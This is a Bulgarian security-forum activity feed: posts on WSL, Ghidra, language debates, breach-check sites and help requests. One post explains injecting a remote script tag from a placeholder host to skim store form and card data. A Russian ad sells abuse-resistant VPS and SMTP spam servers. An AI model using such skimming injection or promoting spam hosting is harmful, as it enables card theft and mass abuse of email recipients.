Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

Цялата активност

Този поток се обновява автоматично     

  1. Последната седмица
  2. Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.
  3. Avatara

    Комуникация

    Здравей, Напълно те подкрепям. Трябва да се знае английски, защото за езиците от високо ниво това е огромно предимство. Не знам дали сте запознати, но в Малайзия (и не само там) използването на английски език в много сфери е забранено със закон от 1985 година. Бяха ми нужни три години за да разбера защо това е направено. Повярвайте има желязна логика. Преди години имах сериозен проблем при работата си с японци. Те не признават никаква техническа документация на английски език. Само на японски и само на катакана. Никакъв компромис. С датчаните е още по-страшно. Там изискват да знаете писмено и говоримо датски. Английският език в Дания не се използва в работни взаимоотношения. Пиша това въз основа на горчив, личен опит. Ако искаме развитие в технологичната сфера е нужно да имаме солидна база. Не може да изучаваме програмиране, а да не знаем какво е алгоритъм. Друга много сериозна грешка е, че битува схващането, че трябва да си добър математик за да си добър програмист. Да, но числените методи в програмирането са доста далеч от фундаменталната математика. Да не споменавам, че съществува огромен набор от математически прийоми, създадени от програмисти, за които математиците не са и чували. Мисля, че най-напред би следвало да се научим да общуваме. Това е много трудно. Още по-трудно е да се научим да водим дебат (дискусия). Най-трудно от всичко е да обменяме знания. Признавам, че и до момента ми е трудно да се справя с това. Това, което ми харесва в този форум е, че има дискусия. За разлика от много други тук се спазва добрият тон, а това е едно много хубаво начало.
  4. Earlier
  5. Моля да ме извините, ако въпроса ми е некоректен и да не отговаряте на него. На мен ми е интересно по-надълбоко как работи програмата с операционната система. След като прочете информацията и я обработи FPS върху същите клетки памет ли я записва? Разсъждавах как би било по-добре да се прави. Просто да се изтрие шифрована информация или да се използва програма за изтриване с последващ запис на нули.
  6. Pentester

    Linux Shell on WIN10

    Аз го знаех но не се занимавах да го пробвам този метод и така си остана.
  7. Pentester

    Комуникация

    @Avatara Разбираме те напълно братле, ако сте забелязали в моите клипове всичко е на български. Трябва да се знае английски (може да не е перфектно). Трудно можеш да обърнеш някоя английска дума на български в буквалният й смисъл. Както знам а и ти знаеш тези които са напреднали знаем, че е пълно с команди и термини и ни е трудно когато свикнем с тях и ползваме английски думи и термини това е, не че сме против българският език
  8. Може да се bypass-не но е играчка :)
  9. Здравейте, Горещо ви препоръчвам следния документ: http://nao-rozhen.org/astrocalendar/2016/Astronomical_calendar_2016.pdf В него има доста подробни описания и таблици, които биха могли да бъдат коригирани. Има и много полезни коефициенти и формули. Проблемът е, че този процес е динамичен като характер (поне така споделиха колегите). Ще потърся още информация по темата.
  10. Avatara

    Комуникация

    Ако ми позволите да изкажа скромно мнение. Идеята да се преподава технологична материя на английски е меко казано ... лишена от логика. И за да не бъда голословен, ще приведа съвсем елементарен пример, как използването на "английски" (или "англоезични") термини може да ви направи за смях. Нека разгледаме думата "ДИГИТАЛЕН". Според мнозина думата има английски произход и означава "цифров". За съжаление, това е напълно погрешно схващане. Думата "дигитален" се използва още от Аристотел (все пак освен учител на Александър Македонски той е и бащата на кибернетиката, като наука, а информатиката е раздел от кибернетиката), а тогава не е имало Великобритания, да не говорим за английски език. Думата има древногръцки произход и означава, задълбочено познаване на отделните детайли (няма точен превод на английски). Към момента думата "дигитален" е основен термин в съвременната психология и означава определен вид личностна характеристика. За първи път думата "дигитален" (digital - дижитъл) на английският език се използва за дискретни процеси, но дискретните процеси не винаги имат цифров характер. Много от дискретните процеси са аналогови. Идеята, че "дигитален" означава "цифров" идва от латинското значение на думата "digitus". На латински това означава "пръст на ръката". Под digitus, в древен Рим се разбират цифри от 1 до 10 (или от 0 до 9, както е модерно) защото някога са броели на пръсти. Тук би следвало да възкликна като Ян Хус (да не се бърка с герой от комикси) "Santa Simplicitas!". Няма да го направя. Причината е, че от историята знаем, че този, който е изрекъл тези думи са го изгорили жив, защото си е позволил да изказва мнение, различно от модерното за онова време. Правилно е да употребяваме думата "цифров процес", а не "дигитален процес" (на български "дискретен процес"). Да. Не е модерно, но е правилно. За справка "Англо-български технически речник". Съществува и обратна логика в превода. Как например ще преведете на български думата subtle, но така, че да запазите нейното значение, така както то се ползва в английския език? Искам да спомена, че английският език е най-сложният език в света (над 350 000 думи). Имайте в предвид, че дори най-високо ерудираните хора употребяват максимум 3500 думи. А останалите? За съжаление английският език, който масово се е наложил в момента няма нищо общо с английския език, който познавам (този на който е писал Оскар Уайлд, примерно). Мисля, че причината е, че аз съм го учил в католическа църква, а сега се преподава къде ли не. Презрително това, което масово се говори като английски се нарича "кокни" и повярвайте употребата на подобен разговорен език не ви прави по-привлекателни. На такъв език разговарят хората "втора ръка" във Обединеното кралство и red necks (червените вратове) в САЩ. На практика някой може да се почувства creepy, ако чете кратки (задължително кратки) текстове, изпълнени с жаргонни фрази (сленг). Мога да ви дам още един пример, който е доста забавен. В България се казва "ЕЙПЪЛ" и с това много се гордеем. Ако в САЩ кажете това за компанията Apple, по този провлачен начин, ще станете за посмешище (не всички американци са тактични и възпитани). Американците изговарят името на фирмата като "АПЪЛ" (оказва се, че било жаргон свързан с две отделни думи APPLication и Electronics - APPLE). Все пак употребяваме "апликейшън", а не "ейпликейшън". За бит и нант съм писал. Но не е зле никога да не забравяте, че думата адитивен (произхожда от addivitus) има латински, а не английски произход. А без тази дума няма съвременна информатика. Забележка: Не знам колко знаят какво е адитивна логаритмична мярка, но повечето хора знаят какво е "бит" (което си е адитивна логаритмична мярка за измерване на единица информация). Та в този ред на мисли "киоска" е руска дума и буквално означава павилионче, на което се продават вестници. "Киоска" също е термин от съвременните IT-технологии, но не съм чувал призиви да изучаваме комуникационни технологии на руски език. Все пак си спомням за едно незабравимо произведение от българската драматургия. Надявам се да сте чували за "Криворазбраната цивилизация", написана в далечната 1871 година от Добри Войников. Та като чета понякога някои чуждици си спомням с умиление за Мадам Злата (съпругата на Хаджи Коста) и дъщеря й Анка. Разликата от тогава и сега е само в езика. Тогава е било "францужки" а сега е "енгелизки". Ерго, някои определено още живеят в 1871 година и се изживяват, като прототипи на Маргариди, в стремежа си да се "европейчат" (американчат и пр.). А после ".. поради що се срамиш ...". Ами заради таквизи се срамим. Но като се замисля по едно време бяхме готови и от кирилицата да се отречем. В този ред на мисли ... Направи ли ви впечатление на какъв чист и изискан български език говореше българският актьор, спечелил Оскар? Обърнахте ли внимание на богатат му езикова култура? И това е човек, който живее и работи в Холивуд и в ежедневието си комуникира само и единствено на английски език. Помислете сериозно над това.
  11. Avatara

    Linux Shell on WIN10

    Благодаря за прекрасния материал. Ако ми позволите бих добавил и още нещо, което е малко известно. А знаете ли, че може да напишете един програмен код, който да се изпълнява без проблем на Windows, Linux, iOS и Android? Да. От години Microsoft и Embarcadero, независимо един от друг работят в направление One Platform. На практика конфликт между Linux и Microsoft никога не е имало. Точно обратното. Microsoft винаги активно са подкрепяли развитието на Linux и то не само финансово. Много от потребителските версии на Linux, ползват патенти на Microsoft. Има и още нещо, което е много малко известно, но за което съм писал. А да знаете, че всички операционни системи поддържат нещо, наричано IOUtils? На практика точно това е ядрото на много мощен код, който позволява с лекота да преминавате от една ОС в друга. Изключително полезен инструмент, който прави с файловите системи неща, за които дори не сте мечтали. Между другото в Microsoft Store има много приложения за Linux и това си е съвсем в реда на нещата. Още веднъж благодаря на Linuxmaster за прекрасният материал.
  12. freeman987

    Комуникация

    Това не е тема за заяждане. Поради технологията, която се използва в Интернет, формулировката на потребителските имена в 90 % от случаите позволява единствено използването на латински букви.
  13. http://pwndb2am4tzkvold.onion Ето я и hardcore версията на haveibeenpwned
  14. Проверете, дали са ви хакнали? Публикуваха списък на 7,695,066,389 хакнати акаунти. Това е световен рекорд от всички времена. На сайта https://haveibeenpwned.com/ може да проверите, дали и вашият e-mail адрес е компрометиран. Добре е, да си смените веднага паролите. На същият сайт има доста подробности около пробивите. Също така, може да се свали и списъка на паролите. https://haveibeenpwned.com/Passwords
  15. TheZero

    Комуникация

    Колеги, добре е, че държите на българското, но защо не си прегледате никовете? Май и те не са български.
  16. Добре е да се отбележи, че reflected XSS се блокира от XSS AudItor-а под Google Chrome. Просто не работи. В този смисъл Chrome е полезен. Незнам и за актуален bypass в момента.
  17. Cvetomirg

    Help

    Да пише на съпорта да си върне профила? Най-вероятно са му гепили мейла, и оттам профила, затова се слага 2FA, да е по-сигурно? Ако от фейсбуук не ти съдействат, няма как да стане.
  18. Абузоустойчивые Windows VPS #Carlito w1 Xeon 4 Ядер РАМ 3 ГБ SSD 42 ГБ Порт 1Gbps Установка 1-10 Часов > $50 /В Месяц #Carlito w2 Xeon 6 Ядер РАМ 5 ГБ SSD 62 ГБ Порт 1Gbps Установка 1-10 Часов > $70 /В Месяц #Carlito w3 Xeon 8 Ядер РАМ 6 ГБ SSD 82 ГБ Порт 1Gbps Установка 24-48 Часов > $100 /В Месяц Абузоустойчивые SMTP #STANDARD IP SMTP Виртуальный сервер Виртуальный SMTP Сервер Выделенный IP Логин Пароль Порт 587 или 25 24000 сообщений в день Установка 1-10 Часов > $60 /В Месяц #PREMIUM IP SMTP Виртуальный сервер Виртуальный SMTP Сервер 2 Выделенных IP Логин Пароль Порт 587 или 25 84000 сообщений в день Установка 1-10 Часов > $110 /В Месяц #Абузоустойчивый Домен SMTP + SSL Логин Порт 587 Выделенный IP (NOT SHARED) Логин Sender E-mail like username Пароль Порт 587 SSL 24000 сообщений в день Установка 1-10 Часов > $80 /В Месяц Абузоустойчивые Linux VPS #Carlito L1 4 Ядра РАМ 2 ГБ SSD 30 ГБ Порт 1Gbps Установка 1-10 Часов > $40 /В Месяц #Carlito L2 6 Ядер РАМ 4 ГБ SSD 50 ГБ Порт 1Gbps Setup 1-10 Часов Скоростной Абузоустойчивый Виртуальный Выделенный Сервер 4 Ядра РАМ 4 ГБ SSD 40 ГБ Порт 10Gbps > $70 /В месяц Спам-Пакет 1 Windows VPS (4 Ядра,РАМ 4ГБ, SSD 40ГБ) 1 SMTP IP VPS Сервер Предустановленный софт = SendBlaster + Лицензия > $100 /В месяц SMTP Windows Server Абузоустойчивый Сервер 74000 сообщений в день Порт 10Gbps Предустановленный софт = SendBlaster + Лицензия Установка 1-2 Дня > $110 /В месяц Абузоустойчивые Выделенные серверы #Noose D1 2x Quad Core Intel CPU (16 логических ядер) РАМ 16ГБ HDD 1ТБ Установка 1-2 Дня > $200 /В Месяц #Noose D2 2X Quad Core Intel CPU (16 логических ядер) РАМ 32ГБ HDD 1ТБ Установка 1-2 Дня > $260 Для заказа и всем вопросам добро пожаловать -> JABBER ID: bpservice@xjabber.org bpservice1@xjabber.org
  19. Yodemirov98

    Help

    Един мой приятел има Facebook група и някой му е хакнал профила и взел групата и се ебава с всички моля ви помогнете да си върнем профила и групата😔
  20. LinuxMaster

    Linux Shell on WIN10

    - Здрасти знаехте ли че можете да ползвате линукс шел под Windows? - Защото аз не знаех :Д ето как става Натиснете старт менюто и тръсете "Turn Windows features on or off." Търсете и сложете тикче на "Windows Subsystem for Linux". След това рестарт на компа. След рестарта отворете Microsoft Store и търсете Linux Изберете си OS и го инсталирайте. След това отново го потърсете в старт менюто и го пуснете останалото е лесно ще избирате име и парола за логин. Правата ви ще са потребителско ако искате да сте ROOT напишете следните команди в конзолата за да смените първо root паролата. sudo passwd root Слагате текущата парола след това новата. После просто отворете CMD и вече зависи от това какъв OS сте избрали (Ubuntu) ubuntu config --default-user root OR (Ubuntu 18.04 LTS) ubuntu1804 config --default-user root OR (Ubuntu 16.04 LTS) ubuntu1604 config --default-user root OR (openSUSE Leap 42) openSUSE-42 config --default-user root OR (SUSE Linux) SLES-12 config --default-user root OR (Debian) debian config --default-user root OR (Kali Linux) kali config --default-user root Ето на какво прилича
  21. Здравейте колеги. Издирвам алгоритъм за изчисляване на изгрева и залеза на луната спрямо дата и координати. Ако Ви се намира формула и тя ще ми свърши работа. Благодаря Ви предварително!
  22. Pentester

    Комуникация

    На същото мнение съм.
  23. freeman987

    Тривиадор

    Флаш игра трудно се "хаква".
  24. AGLR

    Тривиадор

    Здравейте! Интересувам се от хак за Тривиадор.. Някой може ли да ми помогне?
  25. Тази седмица е бележитa - IDA току що беше пенсионирана със специалното участие на NSA. За тези който незнаят, IDA е най-пълния туул за reverse engineering, и най-скъпия съответно. Като една от най-важните му функции беше ASSEMBLY към pseudo C decompilation -XRay модула. Днес NSA рилийзнаха техния туул open source- ghidra ['идра] https://ghidra-sre.org/. Не съм му направил пълен анализ но на пръв прочит, виждам няколко неща: - Промяна в един от прозорците, афектира веднага всички различни view-та на програмата; - Модула на за декомпилация се чете (според мен) с една идея по добре от този на IDA; Днес ще опитам да видя как се получава динамичния анализ и да мина през документацията . !!! В гит-а се намира development версия на програмата. Тряба да едитнете конфигурационните файлове за да изключите JVM debug mode. Иначе сте уязвими на RCE. Нищо ново, джавата така си работи.
  26. d3k4z

    Комуникация

    Тежка е короната на модераторите
  1. Зареди още активност
×
×
  • Създай нов...

Important Information

За да посещавате този уебсайт е необходимо да се съгласите с Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.